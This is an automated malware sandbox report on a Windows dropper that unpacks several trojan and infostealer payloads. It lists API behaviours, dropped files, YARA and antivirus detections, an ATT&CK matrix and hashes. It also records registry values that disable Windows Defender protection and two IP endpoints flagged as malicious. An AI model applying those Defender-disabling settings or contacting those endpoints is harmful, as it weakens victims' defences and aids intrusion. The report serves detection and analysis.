                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00382390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00382390
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01062390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_01062390
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00AC2390
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_002F2390
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_0038202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_0038202A
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_02E17043 push dword ptr fs:[00000030h]6_2_02E17043
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeMemory allocated: page read and write | page guardJump to behavior
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00386F40 SetUnhandledExceptionFilter,0_2_00386F40
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00386CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00386CF0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01066F40 SetUnhandledExceptionFilter,1_2_01066F40
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exeCode function: 1_2_01066CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01066CF0
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC6F40 SetUnhandledExceptionFilter,2_2_00AC6F40
                Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exeCode function: 2_2_00AC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00AC6CF0
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F6F40 SetUnhandledExceptionFilter,3_2_002F6F40
                Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exeCode function: 3_2_002F6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_002F6CF0
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_003818A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_003818A3
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeCode function: GetLocaleInfoA,6_2_00417A20
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00387155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00387155
                Source: C:\Users\user\Desktop\plEnknXWQD.exeCode function: 0_2_00382BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00382BFB
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeCode function: 4_2_00007FF9A56C077D GetUserNameA,4_2_00007FF9A56C077D

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED
                Source: Yara matchFile source: 0.3.plEnknXWQD.exe.49d9220.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.plEnknXWQD.exe.49d9220.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.307182274.0000000004904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe, type: DROPPED

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.3.ns5251Ks.exe.2c20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.will6283.exe.4deee20.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ns5251Ks.exe.2bf0e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.3.will6283.exe.4deee20.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.368689660.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.368971043.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000003.336833965.0000000002C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe, type: DROPPED
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts3
                Native API
                1
                Windows Service
                2
                Bypass User Access Control
                21
                Disable or Modify Tools
                1
                Input Capture
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Encrypted Channel
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                System Shutdown/Reboot
                Default Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop Protocol1
                Input Capture
                Exfiltration Over Bluetooth1
                Application Layer Protocol
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts1
                Service Execution
                Logon Script (Windows)1
                Windows Service
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)1
                Process Injection
                22
                Software Packing
                NTDS26
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets13
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common2
                Bypass User Access Control
                Cached Domain Credentials21
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                Masquerading
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                Virtualization/Sandbox Evasion
                Proc Filesystem1
                System Owner/User Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                Access Token Manipulation
                /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                Process Injection
                Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                Rundll32
                Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 829681 Sample: plEnknXWQD.exe Startdate: 18/03/2023 Architecture: WINDOWS Score: 100 51 Multi AV Scanner detection for domain / URL 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Antivirus detection for dropped file 2->55 57 8 other signatures 2->57 9 plEnknXWQD.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 2 other processes 2->16 process3 file4 43 C:\Users\user\AppData\Local\...\will6283.exe, PE32 9->43 dropped 45 C:\Users\user\AppData\Local\...\ry40VI69.exe, PE32 9->45 dropped 18 will6283.exe 1 4 9->18         started        process5 file6 35 C:\Users\user\AppData\Local\...\will3629.exe, PE32 18->35 dropped 37 C:\Users\user\AppData\Local\...\qs5212ER.exe, PE32 18->37 dropped 59 Antivirus detection for dropped file 18->59 61 Multi AV Scanner detection for dropped file 18->61 63 Machine Learning detection for dropped file 18->63 22 will3629.exe 1 4 18->22         started        signatures7 process8 file9 39 C:\Users\user\AppData\Local\...\will3971.exe, PE32 22->39 dropped 41 C:\Users\user\AppData\Local\...\py81WM70.exe, PE32 22->41 dropped 65 Multi AV Scanner detection for dropped file 22->65 67 Machine Learning detection for dropped file 22->67 26 will3971.exe 1 4 22->26         started        signatures10 process11 file12 47 C:\Users\user\AppData\Local\...\ns5251Ks.exe, PE32 26->47 dropped 49 C:\Users\user\AppData\Local\...\mx8896IL.exe, PE32 26->49 dropped 69 Multi AV Scanner detection for dropped file 26->69 71 Machine Learning detection for dropped file 26->71 30 ns5251Ks.exe 1 1 26->30         started        33 mx8896IL.exe 9 1 26->33         started        signatures13 process14 signatures15 73 Multi AV Scanner detection for dropped file 30->73 75 Detected unpacking (changes PE section rights) 30->75 77 Detected unpacking (overwrites its own PE header) 30->77 79 Machine Learning detection for dropped file 33->79 81 Disable Windows Defender notifications (registry) 33->81 83 Disable Windows Defender real time protection (registry) 33->83

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                plEnknXWQD.exe67%ReversingLabsWin32.Trojan.Plugx
                plEnknXWQD.exe53%VirustotalBrowse
                plEnknXWQD.exe100%AviraHEUR/AGEN.1252166
                plEnknXWQD.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe100%AviraHEUR/AGEN.1252166
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe100%AviraHEUR/AGEN.1252166
                C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe83%ReversingLabsWin32.Spyware.RedLine
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe84%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe70%ReversingLabsWin32.Trojan.Plugx
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\will6283.exe55%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe73%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\qs5212ER.exe76%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe64%ReversingLabsWin32.Trojan.Plugx
                C:\Users\user\AppData\Local\Temp\IXP001.TMP\will3629.exe55%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe46%ReversingLabsWin32.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\IXP002.TMP\py81WM70.exe51%VirustotalBrowse
                C:\Users\user\AppData\Local\Temp\IXP002.TMP\will3971.exe64%ReversingLabsWin32.Trojan.Plugx
                C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe88%ReversingLabsByteCode-MSIL.Trojan.Casdet
                C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe46%ReversingLabsWin32.Trojan.Generic
                SourceDetectionScannerLabelLinkDownload
                1.0.will6283.exe.1060000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                0.0.plEnknXWQD.exe.380000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                3.3.will3971.exe.47f3c20.0.unpack100%AviraHEUR/AGEN.1253311Download File
                2.3.will3629.exe.4a08820.0.unpack100%AviraHEUR/AGEN.1253311Download File
                1.2.will6283.exe.1060000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                0.2.plEnknXWQD.exe.380000.0.unpack100%AviraHEUR/AGEN.1252166Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://api.ip.sb/ip0%URL Reputationsafe
                https://api.ip.sb/ip0%URL Reputationsafe
                62.204.41.87/joomla/index.php0%Avira URL Cloudsafe
                62.204.41.87/joomla/index.php13%VirustotalBrowse
                193.233.20.30:41250%Avira URL Cloudsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                62.204.41.87/joomla/index.phptrue
                • 13%, Virustotal, Browse
                • Avira URL Cloud: safe
                low
                193.233.20.30:4125true
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.ip.sb/ipwill6283.exe, 00000001.00000003.308015550.0000000004D3E000.00000004.00000020.00020000.00000000.sdmp, qs5212ER.exe.1.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                No contacted IP infos
                Joe Sandbox Version:37.0.0 Beryl
                Analysis ID:829681
                Start date and time:2023-03-18 21:01:50 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:13
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:plEnknXWQD.exe
                Original Sample Name:548ee02a30c2dcca5f3f91e90212ec29.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@15/10@0/0
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:
                • Successful, ratio: 65.1% (good quality ratio 62.4%)
                • Quality average: 85%
                • Quality standard deviation: 24%
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 142
                • Number of non-executed functions: 146
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240s for rundll32
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                No simulations
                No context
                No context
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exej8OyCuPzJD.exeGet hashmaliciousAmadey, RedLineBrowse
                  gGz6hXsQ5z.exeGet hashmaliciousAmadey, RedLineBrowse
                    ZXcrrc9u12.exeGet hashmaliciousAmadey, RedLineBrowse
                      2ZWTFBumFH.exeGet hashmaliciousAmadey, RedLineBrowse
                        QEjCVy6niV.exeGet hashmaliciousAmadey, RedLineBrowse
                          ad9ffe0b58f2.exeGet hashmaliciousAmadey, RedLineBrowse
                            setup.exeGet hashmaliciousAmadey, RedLineBrowse
                              setup.exeGet hashmaliciousAmadey, RedLineBrowse
                                tZ8P3TRdFa.exeGet hashmaliciousAmadey, RedLineBrowse
                                  V28mWj6WVa.exeGet hashmaliciousAmadey, RedLineBrowse
                                    Fzm8qTgKaa.exeGet hashmaliciousAmadey, RedLineBrowse
                                      z5iTPC1sT2.exeGet hashmaliciousAmadey, RedLineBrowse
                                        HkYl8K3mLN.exeGet hashmaliciousAmadey, RedLineBrowse
                                          setup.exeGet hashmaliciousAmadey, RedLineBrowse
                                            JlbJfLNR4d.exeGet hashmaliciousAmadey, RHADAMANTHYSBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\mx8896IL.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):226
                                              Entropy (8bit):5.354940450065058
                                              Encrypted:false
                                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                              MD5:B10E37251C5B495643F331DB2EEC3394
                                              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                              Process:C:\Users\user\AppData\Local\Temp\IXP003.TMP\ns5251Ks.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):321
                                              Entropy (8bit):5.355221377978991
                                              Encrypted:false
                                              SSDEEP:6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
                                              MD5:03C5BA5FCE7124B503EA65EF522177C3
                                              SHA1:F76B1F538D5EA66664355901E927B2F870ACCDD8
                                              SHA-256:8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
                                              SHA-512:151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                              Process:C:\Users\user\Desktop\plEnknXWQD.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):241152
                                              Entropy (8bit):6.346560230971658
                                              Encrypted:false
                                              SSDEEP:6144:f36hrz456we4lz7zzZ5my2IuViMqJnyJQ:Pxpz7LmeuVi3nN
                                              MD5:5086DB99DE54FCA268169A1C6CF26122
                                              SHA1:003F768FFCC99BDA5CDA1FB966FDA8625A8FDC3E
                                              SHA-256:42873B0C5899F64B5F3205A4F3146210CC63152E529C69D6292B037844C81EC4
                                              SHA-512:90531B1B984B21CE62290B713FFC07917BBD766EEF7D5E6F4C1C68B2FC7D29495CDD5F05FD71FE5107F1614BBB30922DCFB730F50599E44AEAFF52C50F46B8B5
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ry40VI69.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 83%
                                              • Antivirus: Virustotal, Detection: 84%, Browse
                                              Joe Sandbox View:
                                              • Filename: j8OyCuPzJD.exe, Detection: malicious, Browse
                                              • Filename: gGz6hXsQ5z.exe, Detection: malicious, Browse
                                              • Filename: ZXcrrc9u12.exe, Detection: malicious, Browse
                                              • Filename: 2ZWTFBumFH.exe, Detection: malicious, Browse
                                              • Filename: QEjCVy6niV.exe, Detection: malicious, Browse
                                              • Filename: ad9ffe0b58f2.exe, Detection: malicious, Browse
                                              • Filename: setup.exe, Detection: malicious, Browse
                                              • Filename: setup.exe, Detection: malicious, Browse
                                              • Filename: tZ8P3TRdFa.exe, Detection: malicious, Browse
                                              • Filename: V28mWj6WVa.exe, Detection: malicious, Browse
                                              • Filename: Fzm8qTgKaa.exe, Detection: malicious, Browse
                                              • Filename: z5iTPC1sT2.exe, Detection: malicious, Browse
                                              • Filename: HkYl8K3mLN.exe, Detection: malicious, Browse
                                              • Filename: setup.exe, Detection: malicious, Browse
                                              • Filename: JlbJfLNR4d.exe, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..M.o...o...o..B....o..B....o..B....o.......o.......o......5o..B....o...o...o.......o....m..o.......o..Rich.o..................PE..L...:[.d............................Ut............@.......................................@.................................xp..d................................(..pC..p....................D.......C..@............................................text............................... ..`.rdata.. ...........................@..@.data...H'...........j..............@....rsrc...............................@..@.reloc...(.......*..................@..B........................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\plEnknXWQD.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):872960
                                              Entropy (8bit):7.906390008144435
                                              Encrypted:false
                                              SSDEEP:12288:gMrny90bdCMdtDU2IwSdU+L6bNCD0L+W9ow/ZQ0wXQw4760VC8Dpem9s97AY/:XycURwXTNY0iWKrLQNCyHS7z/
                                              MD5:52B9E7C5A314A3E0BD0AF989586DE77B
                                              SHA1:3A5D97D5A5F3305F588A8502010A10B51D43E37B
                                              SHA-256:89AC16F365BEC445048564B247F8B944D8D77C2A8EACE099F72F9EC171921B66
                                              SHA-512:0CBE1D225D48AFBF66424137A51BB3EF9BF2B7C4F52B059154E692624EBAC7387C5740267D29CB9D96C65400B4DFBCB18140FFF0E2D8453892032F6F9E0DACE6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 70%
                                              • Antivirus: Virustotal, Detection: 55%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.......................................@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................|..............@..@.reloc...............H..............@..B........................................................................................................................................................................................................................................................................................................................................
